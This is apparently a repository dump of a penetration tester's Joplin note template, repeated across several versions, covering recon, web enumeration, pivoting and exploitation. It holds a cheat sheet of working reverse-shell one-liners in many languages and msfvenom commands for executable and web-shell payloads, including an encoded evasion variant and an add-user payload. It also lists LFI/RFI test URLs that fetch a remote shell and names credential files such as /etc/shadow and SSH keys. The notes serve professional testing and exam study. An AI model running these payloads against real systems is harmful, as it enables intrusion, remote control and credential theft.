sections for priv esc 30 | 31 | v3.0 Major Refactoring Overhaul 32 | - Added sub notebooks (Recon Targets, Enumeration Targets, Exploitation Targets, Post Exploitation Targets). Makes it easier to organize all of the notes you have for assessing the targets instead of having them cluttered in your other notes. 33 | - Broke down the recon notes to include a discovery and a host scan sub notebooks 34 | - Moved Pivot/Tunneling into the Recon Notes Section. 
[Pivoting/Tunneling](../Pentest%20Template%20Master%203.0/1.%20Recon%20Notes/Pivoting_Tunneling.md) 35 | - Moved Reporting into High Value Information/Reporting SubNotebook 36 | - New section for impacket ntlmrelayx [Impacket NtlmRelayX](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Impacket%20NtlmRelayX.md) 37 | - New section for pretender [Pretender](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Pretender.md) 38 | - New section or clean up with responder [Responder](../Pentest%20Template%20Master%203.0/3.%20Enumeration%20Notes/Responder.md) 39 | - New section including how to use villian [Villian Cheatsheet](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/Villian%20Cheatsheet.md) 40 | - New section for editable services [General Notes](../Pentest%20Template%20Master%203.0/7.%20Post%20Exploitation/Editable%20Services/General%20Notes.md) 41 | - Added a new PWK V2/V3 OSCP Report Template [OSCP Report Template V2](../Pentest%20Template%20Master%203.0/9.%20High%20Value%20Information_Reporting/Reporting/OSCP%20Report%20Template%20V2.md) 42 | - Added a PowerShell ISO oneliner if you want to launch your payloads through an ISO [General Notes](../Pentest%20Template%20Master%203.0/5.%20Exploitation%20Notes/General%20Notes.md) 43 | 44 | 45 | Shoutout to TheGetch (https://github.com/TheGetch) for sharing some of his notes and giving me some inspiration to the hiearchy he has. 46 | 47 | If you want to see his current methodolgy you can find it here: https://github.com/TheGetch/Penetration-Testing-Methodology -------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3. Exploitation/1. General Notes.md: -------------------------------------------------------------------------------- 1 | ## Pre-requisites for runninging exploits 2 | 3 | - Check the version of the operating system. 4 | - Check the software version. 
- Check if there is an exploit for it (Searchsploit, ExploitDB, Google, etc).
- If you have an exploit, is there a Metasploit Module for it?

## Default Credentials

- https://cirt.net/passwords
- https://github.com/danielmiessler/SecLists/tree/master/Passwords/Default-Credentials

## Reverse Shells

Bash:

- bash -i >& /dev/tcp/IP ADDRESS/8080 0>&1

Perl:

```
perl -e 'use Socket;$i="IP ADDRESS";$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```

Python:

- python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP ADDRESS",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

IPv6:

- python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4343,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'

Ruby:

- ruby -rsocket -e'f=TCPSocket.open("IP ADDRESS",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
- ruby -rsocket -e 'exit if fork;c=TCPSocket.new("[IPADDR]","[PORT]");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

PHP:

Pentest Monkey Reverse Shell for PHP:
In Kali:

/usr/share/webshells/php/php-reverse-shell.php

Link: http://pentestmonkey.net/tools/web-shells/php-reverse-shell

- php -r '$sock=fsockopen("IP ADDRESS",1234);exec("/bin/sh -i <&3 >&3 2>&3");'

Powershell:

```
$callback = New-Object System.Net.Sockets.TCPClient("IP ADDRESS",53);$stream = $callback.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$callback.Close()
```

Golang:

- echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","IP ADDRESS:8080");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

AWK:

- awk 'BEGIN {s = "/inet/tcp/0/IP ADDRESS/4242"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

Other Reverse Shells:
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md

## Other Resources

- Amsi-Bypass-Powershell: https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell

-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/3.
Enumeration Notes/Pretender.md: --------------------------------------------------------------------------------
# Source: https://github.com/RedTeamPentesting/pretender

# Installation

## In Kali:
- git clone https://github.com/RedTeamPentesting/pretender
- go build
- pretender --help

## Using Pretender:
- pretender -i eth0
- pretender -i eth0 --dry (Only logs incoming queries and does not answer any of them)
- pretender -i eth0 --dry --no-ra # without router advertisements

## Options to disable certain attacks:

- `--no-dhcp-dns`
- `--no-lnr`
- `--no-mdns`
- `--no-llmnr`
- `--no-netbios`
- `--no-ra`

## Tips

- Make sure to enable IPv6 support in `ntlmrelayx.py` with the `-6` flag
- Pretender can be configured to stop after a certain time period for situations where it cannot be aborted manually (`--stop-after` and `main.vendorStopAfter`)
- Host info lookup (which relies on the ARP table, IP neighbours and reverse lookups) can be disabled with `--no-host-info` or `main.vendorNoHostInfo`
- If you are not sure which interface to choose (especially on Windows), list all interfaces with names and addresses using `--interfaces`
- If you want to exclude hosts from local name resolution spoofing, make sure to also exclude their IPv6 addresses or use `--no-ipv6-lnr`/`main.vendorNoIPv6LNR`
- DHCPv6 messages usually contain a FQDN option (which can also sometimes contain a hostname which is not a FQDN). This option is used to filter out messages by hostname (`--spoof-for`/`--dont-spoof-for`). You can decide what to do with DHCPv6 messages without FQDN option by setting or omitting `--ignore-nofqdn`
- Depending on the build configuration, either the operating system resolver (`CGO_ENABLED=1`) or a Go implementation (`CGO_ENABLED=0`) is used. This can be important for host info collection because the OS resolver may support local name resolution and the Go implementation does not, unless a stub resolver is used.
- The host info functionality is currently only available for Windows and Linux.
- A custom MAC address vendor list can be compiled into the binary by replacing the default list `hostinfo/mac-vendors.txt`. Only lines with MAC prefixes in the following tab-separated format are recognized: `FF:FF:FF<tab>VendorID<tab>Vendor` (the MAC prefix length can be arbitrary).
- If you only want to perform Kerberos relaying you can specify `--no-lnr` and `--spoof-types SOA` to ignore any queries that are unrelated to the attack.
- When conducting a Kerberos relay attack where `krbrelayx.py` runs on a different host than pretender (relay IPv4 address points to a different host that runs `krbrelayx.py`), the host running `krbrelayx.py` will also need to run pretender in order to receive and deny the Dynamic Update query sent to the relay IPv4 address.
- By default, in order to limit disruption during a DHCPv6 DNS Takeover, the option `--delegate-ignored-to` can be used to delegate ignored queries to a legitimate DNS server.
- The option `--dry-with-dhcp` can be combined with `--delegate-ignored-to` to monitor the name resolution queries in the network without disruption.
---
-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/Pivoting_Tunneling.md: --------------------------------------------------------------------------------
# SSH Tunneling

Note: The target must have an SSH service running.

1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1
4. Run commands through the tunnel: proxychains

## Sshuttle

In Kali

Source: https://github.com/sshuttle/sshuttle

- sshuttle -r root@172.21.0.0 10.2.2.0/24

# Meterpreter

Use only if you have a meterpreter shell and you need to pivot to another network.

## Portfwd

- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80

## Autoroute
In Metasploit
1. use post/multi/manage/autoroute
```
msf5 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf5 post(multi/manage/autoroute) >
```
2. set session
3. run

## Metasploit Socks Proxy

```
1  auxiliary/server/socks4a    normal  No  Socks4a Proxy Server
2  auxiliary/server/socks5     normal  No  Socks5 Proxy Server
3  auxiliary/server/socks_unc  normal  No  SOCKS Proxy UNC Path Redirection
```

# Ncat

## Http Proxy
- ncat -vv --listen 3128 --proxy-type http

## Port Forwarder
1. mknod pivot p
2. nc -l -p <port to listen on> 0<pivot | nc <target host> <target port> 1>pivot

# Cntlm

apt install cntlm

1. cntlm -u username@breakme.local -I proxy
2. export http_proxy=http://127.0.0.1:3128; export https_proxy=http://127.0.0.1:3128 (cntlm is a plain HTTP proxy, so both variables point at the http:// listener)
3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"

# netsh port forwarding
- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000

# Proxy Binaries for Windows
Windows 10 has SSH (Thanks WSL!)
plink.exe (In Kali)

# Other Tools:
- ssf: https://github.com/securesocketfunneling/ssf
- rpivot: https://github.com/klsecservices/rpivot
- hans (ICMP Tunneling): http://code.gerade.org/hans/
- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
- Dnscat2: https://github.com/iagox86/dnscat2
- Chisel: https://github.com/jpillora/chisel
- httptunnel: In Kali apt install httptunnel

# Other Resources:

- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/

-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/3.
Exploitation/Msfvenom.md: --------------------------------------------------------------------------------
## Creating a payload

- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

To view the list of payloads: msfvenom -l payloads
To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

## Creating a payload with encoding

- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile

## Creating a payload using a template

- msfvenom -p [payload] -x [template] -f [formattype] > outputfile

## Listening for Msfvenom Payloads:

```
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set lhost
msf5> set lport
msf5> set ExitOnSession false
msf5> exploit -j
```

## Windows Payloads

- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
- msfvenom -p windows/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

## Linux Payloads

- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Add a user in Windows with msfvenom:

- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

## Web Payloads

PHP

- msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
- cat shell.php | pbcopy && echo '<?php ' > shell.php && pbpaste >> shell.php

ASP

- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

## Scripting Payloads

Python

- msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

- msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

- msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Creating an Msfvenom payload with an encoder while removing bad characters:

- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

## Resources:

- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/3.
Exploitation/Msfvenom.md: --------------------------------------------------------------------------------
## Creating a payload

- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

To view the list of payloads: msfvenom -l payloads
To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

## Creating a payload with encoding

- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile

## Creating a payload using a template

- msfvenom -p [payload] -x [template] -f [formattype] > outputfile

## Listening for Msfvenom Payloads:

```
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set lhost
msf5> set lport
msf5> set ExitOnSession false
msf5> exploit -j
```

## Windows Payloads

- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
- msfvenom -p windows/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

## Linux Payloads

- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Add a user in Windows with msfvenom:

- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

## Web Payloads

PHP

- msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
- cat shell.php | pbcopy && echo '<?php ' > shell.php && pbpaste >> shell.php

ASP

- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

## Scripting Payloads

Python

- msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

- msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

- msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Creating an Msfvenom payload with an encoder while removing bad characters:

- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

## Resources:

- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/5.
Exploitation Notes/Msfvenom.md: --------------------------------------------------------------------------------
## Creating a payload

- msfvenom -p [payload] LHOST=[listeninghost] LPORT=[listeningport]

To view the list of payloads: msfvenom -l payloads
To view the payload options: msfvenom -p windows/x64/meterpreter_reverse_tcp --list-options

## Creating a payload with encoding

- msfvenom -p [payload] -e [encoder] -f [formattype] -i [iteration] > outputfile

## Creating a payload using a template

- msfvenom -p [payload] -x [template] -f [formattype] > outputfile

## Listening for Msfvenom Payloads:

```
msf5> use exploit/multi/handler
msf5> set payload windows/meterpreter/reverse_tcp
msf5> set lhost
msf5> set lport
msf5> set ExitOnSession false
msf5> exploit -j
```

## Windows Payloads

- msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/meterpreter_reverse_http LHOST=IP LPORT=PORT HttpUserAgent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36" -f exe > shell.exe
- msfvenom -p windows/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/shell/reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe
- msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -f exe > shell.exe

## Linux Payloads

- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x64/shell_bind_tcp RHOST=IP LPORT=PORT -f elf > shell.elf
- msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elf

Add a user in Windows with msfvenom:

- msfvenom -p windows/adduser USER=hacker PASS=password -f exe > useradd.exe

## Web Payloads

PHP

- msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -f raw > shell.php
- cat shell.php | pbcopy && echo '<?php ' > shell.php && pbpaste >> shell.php

ASP

- msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp

JSP

- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp

WAR

- msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war

## Scripting Payloads

Python

- msfvenom -p cmd/unix/reverse_python LHOST= LPORT= -f raw > shell.py

Bash

- msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -f raw > shell.sh

Perl

- msfvenom -p cmd/unix/reverse_perl LHOST= LPORT= -f raw > shell.pl

Creating an Msfvenom payload with an encoder while removing bad characters:

- msfvenom -p windows/shell_reverse_tcp EXITFUNC=process LHOST=IP LPORT=PORT -f c -e x86/shikata_ga_nai -b "\x0A\x0D"

## Resources:

- https://hacker.house/lab/windows-defender-bypassing-for-meterpreter/
-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_1.0/Pentest Template Master 1.0/2. Enumeration/Services/1. Web/General Notes.md: --------------------------------------------------------------------------------

## Step 1: ALWAYS LOOK AT THE SOURCE CODE OF THE WEBPAGE!

## Web App Scanners

Nikto:

- nikto --url

Wpscan:

- wpscan --url
- wpscan --url --enumerate ap at (All Plugins, All Themes)
- wpscan --url --enumerate u (Usernames)
- wpscan --url --enumerate v

Web Tools for Directory Scanning:

Dirb:

- dirb
- dirb

Gobuster:

- gobuster -u -w /usr/share/wordlists/
- gobuster -u -w /usr/share/wordlists/ -a Firefox (Custom Agent)
- gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html
- gobuster -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
- gobuster -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
- gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200"
- gobuster -v -e -u -w /usr/share/wordlists/ -x .php,.txt,.html -s "200" -o output.txt
- gobuster -s 200,204,301,302,307,403 -u 172.21.0.0 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

Wfuzz:

- wfuzz -w wordlist/general/common.txt http://testphp.vulnweb.com/FUZZ
- wfuzz -z range,0-10 --hl 97 http://testphp.vulnweb.com/listproducts.php?cat=FUZZ
- wfuzz -z file,wordlist/others/common_pass.txt -d "uname=FUZZ&pass=FUZZ" --hc 302 http://testphp.vulnweb.com/userinfo.php (Post Requests)
- wfuzz -z file,wordlist/general/common.txt -b cookie=value1 -b cookie2=value2 http://testphp.vulnweb.com/FUZZ (Fuzzing Cookies)

Dirsearch:

- dirsearch -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 172.21.0.0 -e php

Other Tools:
- Burp Suite
- OWASP Zap
- Cadaver
- SQLMap
- Joomscan

## Testing for LFI:

https://www.exploit-db.com/docs/english/40992-web-app-penetration-testing---local-file-inclusion-(lfi).pdf

Examples:

- http://example.com/index.php?page=etc/passwd
- http://example.com/index.php?page=etc/passwd%00
- http://example.com/index.php?page=../../etc/passwd
- http://example.com/index.php?page=%252e%252e%252f
- http://example.com/index.php?page=....//....//etc/passwd

Interesting Files:

Linux:
- /etc/passwd
- /etc/shadow
- /etc/issue
- /etc/group
- /etc/hostname
- /etc/ssh/ssh_config
- /etc/ssh/sshd_config
- /root/.ssh/id_rsa
- /root/.ssh/authorized_keys
- /home/user/.ssh/authorized_keys
- /home/user/.ssh/id_rsa

Windows:
- /boot.ini
- /autoexec.bat
- /windows/system32/drivers/etc/hosts
- /windows/repair/SAM

## Testing for RFI:

- http://example.com/index.php?page=http://callback.com/shell.txt
- http://example.com/index.php?page=http://callback.com/shell.txt%00
- http://example.com/index.php?page=http:%252f%252fcallback.com%252fshell.txt

## Resources

- Turning LFI to RFI: https://l.avala.mp/?p=241
-------------------------------------------------------------------------------- /README.md: --------------------------------------------------------------------------------
# Project TJ-JPT

## Release Date
May 8th 2020

## Introduction
As a pentester, there are many great resources, cheat sheets, and guidelines that contain a large amount of valuable information. However, it can be frustrating and time-consuming to find these notes or resources that are scattered all over the place. Not to mention the large amount of notes you have stored locally across your system with several different note-taking tools. In addition, some pentesters could be in assessments that are in a closed environment, making it more challenging to transfer their notes and files on their devices. That's when I found [Joplin][Joplin] to be able to suit my needs when I am on engagements.

## A Word of Advice:
This template contains a variety of tools, commands, and resources that I reference to use for certain cases when I am on an engagement. However, it is important that you learn about these tools and understand the references being used! Take some time to look over the resources I put in before you start running these tools or commands blindly. If the tool or command does not work the way it should, then take a step back and troubleshoot it. **Critical thinking** is a necessary skill that all pentesters need to have when they are assessing a variety of options to make a better informed decision.

## Features with Joplin:
- Notes can be searched, copied, tagged, and modified either from the application directly or from your text editor.
- Markdown Editor and Reader. Easy to import and export notes to multiple formats.
- [WebClipper][WebClipper] to save web pages and screenshots from the Firefox and Chrome browsers
- Sync notes on various cloud applications such as NextCloud, Dropbox, OneDrive
- Sync notes on a local file share or WebDav.
- Works on Windows, Linux, macOS, iOS, and Android

## What does the template include?
- Command line references.
- Personal notes that I left as reminders when I am assessing a target.
- PWK Report in Markdown (Can be exported into a `PDF`)

## Instructions
**NOTE:** You must have Joplin installed on your system.
1. Open Joplin
2. Click File and select `Import`
3. Select `JEX - Joplin Export File`
4. Locate the pentest template and it should appear in Joplin

## Feedback, Suggestions and Contributions
Although this template is just the start, there is always room to add new tips, resources, or guides for other people to use in this template. Feel free to post any suggestions that you may have or want to include by submitting an issue in the repo.

## Credit
- A huge shout out goes to [James Hall][James Hall] for originally creating his own pentesting template in Cherry Tree that inspired me to build mine in Joplin. You can find it [here][Github].
- [Offensive Security][Offensive Security]: For reviewing the template and giving me feedback on things to add/improve on the template.
- The developers at [Joplin][Joplin] for making an awesome open-source note-taking tool.

[Joplin]: https://joplinapp.org/
[WebClipper]: https://joplinapp.org/clipper/
[James Hall]: https://twitter.com/411Hall
[Github]: https://411hall.github.io/OSCP-Preparation/
[Offensive Security]: https://www.offensive-security.com/
-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_3.0/Pentest Template Master 3.0/1. Recon Notes/Pivoting_Tunneling.md: --------------------------------------------------------------------------------
# Check if your tunnel is active and running:

- nc -z localhost || echo 'no tunnel open'
- netstat -lpnt | grep | grep ssh
- ps aux | grep ssh
- ss -ntlp

# SSH Tunneling

Note: The target must have an SSH service running.

1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1
4. Run commands through the tunnel: proxychains

## Sshuttle

In Kali

Source: https://github.com/sshuttle/sshuttle

- sshuttle -r root@172.21.0.0 10.2.2.0/24

# Meterpreter

Use only if you have a meterpreter shell and you need to pivot to another network.

## Portfwd

- meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80

## Autoroute
In Metasploit
1. use post/multi/manage/autoroute
```
msf5 post(multi/manage/autoroute) > options

Module options (post/multi/manage/autoroute):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CMD      autoadd          yes       Specify the autoroute command (Accepted: add, autoadd, print, delete, default)
   NETMASK  255.255.255.0    no        Netmask (IPv4 as "255.255.255.0" or CIDR as "/24"
   SESSION                   yes       The session to run this module on.
   SUBNET                    no        Subnet (IPv4, for example, 10.10.10.0)

msf5 post(multi/manage/autoroute) >
```
2. set session
3. run

## Metasploit Socks Proxy

```
1  auxiliary/server/socks4a    normal  No  Socks4a Proxy Server
2  auxiliary/server/socks5     normal  No  Socks5 Proxy Server
3  auxiliary/server/socks_unc  normal  No  SOCKS Proxy UNC Path Redirection
```

## Port Forwarder
1. mknod pivot p
2. nc -l -p <port to listen on> 0<pivot | nc <target host> <target port> 1>pivot

# Cntlm

apt install cntlm

1. cntlm -u username@breakme.local -I proxy
2. export http_proxy=http://127.0.0.1:3128; export https_proxy=http://127.0.0.1:3128 (cntlm is a plain HTTP proxy, so both variables point at the http:// listener)
3. Accessing with browser: chromium --proxy-server="http://127.0.0.1:3128"

# netsh port forwarding
- netsh interface portproxy add v4tov4 listenaddress=127.0.0.1 listenport=9000 connectaddress=192.168.0.10 connectport=80
- netsh interface portproxy delete v4tov4 listenaddress=127.0.0.1 listenport=9000

# Proxy Binaries for Windows
Windows 10 has SSH (Thanks WSL!)
plink.exe (In Kali)

# Other Tools:
- ssf: https://github.com/securesocketfunneling/ssf
- rpivot: https://github.com/klsecservices/rpivot
- hans (ICMP Tunneling): http://code.gerade.org/hans/
- Iodine (ICMP Tunneling over DNS): https://code.kryo.se/iodine/
- Dnscat2: https://github.com/iagox86/dnscat2
- Chisel: https://github.com/jpillora/chisel
- httptunnel: In Kali apt install httptunnel
- ligolo: https://github.com/sysdream/ligolo
- reGeorg: https://github.com/sensepost/reGeorg

# Other Resources:

- https://0xdf.gitlab.io/2019/01/28/pwk-notes-tunneling-update1.html
- https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/
- https://medium.com/maverislabs/proxyjump-the-ssh-option-you-probably-never-heard-of-2d7e41d43464

-------------------------------------------------------------------------------- /Markdown_Versions/Pentest_Template_Master_2.0/Pentest Template Master 2.0/Pivoting_Tunneling.md: --------------------------------------------------------------------------------
# Check if your tunnel is active and running:

- nc -z localhost || echo 'no tunnel open'
- netstat -lpnt | grep | grep ssh
- ps aux | grep ssh

# SSH Tunneling

Note: The target must have an SSH service running.

1. Create SSH Tunnel: ssh -D localhost: -f -N user@localhost -p
2. Setup ProxyChains. Edit the following config file (/etc/proxychains.conf)
3. Add the following line into the config: Socks5 127.0.0.1
4. Run commands through the tunnel: proxychains

## Sshuttle

In Kali

Source: https://github.com/sshuttle/sshuttle

- sshuttle -r root@172.21.0.0 10.2.2.0/24

# Meterpreter

Use only if you have a meterpreter shell and you need to pivot to another network.
31 | 32 | ## Portfwd 33 | 34 | - meterpreter > portfwd add -l 80 -r 172.21.0.0 -p 80 35 | 36 | ## Autoroute 37 | In Metasploit 38 | 1. use post/multi/manage/autoroute 39 | ``` 40 | msf5 post(multi/manage/autoroute) > options 41 | 42 | Module options (post/multi/manage/autoroute): 43 | 44 | Name Current Setting Required Description 45 | ---- --------------- -------- ----------- 46 | CMD autoadd yes Specify the autoroute command (Accepted: add, autoadd, print, delete, default) 47 | NETMASK 255.255.255.0 no Netmask (IPv4 as "255.255.255.0" or CIDR as "/24" 48 | SESSION yes The session to run this module on. 49 | SUBNET no Subnet (IPv4, for example, 10.10.10.0) 50 | 51 | msf5 post(multi/manage/autoroute) > 52 | ``` 53 | 2. set session 54 | 3. run 55 | 56 | ## Metasploit Socks Proxy 57 | 58 | 1 auxiliary/server/socks4a normal No Socks4a Proxy Server 59 | 2 auxiliary/server/socks5 normal No Socks5 Proxy Server 60 | 3 auxiliary/server/socks_unc normal No SOCKS Proxy UNC Path Redirection 61 | 62 | # Ncat 63 | 64 | ## Http Proxy 65 | - ncat -vv --listen 3128 --proxy-type http 66 | 67 | ## Port Forwarder 68 | 1. mknod pivot p 69 | 2. nc -l -p < port to listen on> 0 1>pivot 70 | 71 | # Cntlm 72 | 73 | apt install cntlm 74 | 75 | 1. cntlm -u username@breakme.local -I proxy 76 